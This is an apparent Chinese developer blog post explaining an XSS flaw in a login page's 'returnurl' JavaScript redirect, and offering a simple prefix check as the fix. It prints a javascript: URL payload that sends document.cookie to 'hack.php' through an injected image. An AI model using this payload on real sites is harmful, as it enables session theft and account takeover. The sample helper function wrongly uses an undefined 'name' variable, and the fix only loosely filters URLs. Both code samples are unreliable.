javascript实现“登录后跳回之前页面”的漏洞

www.xxx.com网站有个登录页面login.htm，登录之后需要跳到之前的页面www.yyy.com

url形式如下：http://www.xxx.com/login.htm?returnurl=http://www.yyy.com

long.htm代码里面通过javascript跳转：

/**
* javascript获取URL指定参数对应的值
* @method getQueryString
* @param {string} s 参数名
* @return {string}
*/
function getQueryString(s){
    var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
    var r = window.location.search.substr(1).match(reg);
    if (r != null) return r[2]; return "";
}

location.href=getQueryString("returnurl");

这看上去没问题，满足业务需求，但是有个js漏洞 (感谢csy同学指出)

如果url变成：

http://www.xxx.com/login.htm?returnurl=javascript:alert(document.cookie); 

登录完之后就能取得整个本地cookie。

 

更进一步，url变成：

http://www.xxx.com/login.htm?returnurl=

javascript:var%20img%20=%20document.createElement%28%27img%27%29;img.src=%27hack.php?cookie=%27+document.cookie;document.body.appendChild%28img%29;

如果恶意用户散布这个链接，只要一点击，就可以偷取用户的cookie，从而模拟用户登录大多数网站，达到盗取账号的目的。

 

所以这个漏洞很有必要堵上，处理一下参数里面的值，比如以判断参数值是否以http:开头（我们采用的），总之根据你的业务需要的方式做具体防范。

var returnurl = getQueryString("returnurl");
returnurl = returnurl.toLowerCase().indexOf('http:') == 0 ? returnurl : "";
location.href=returnurl;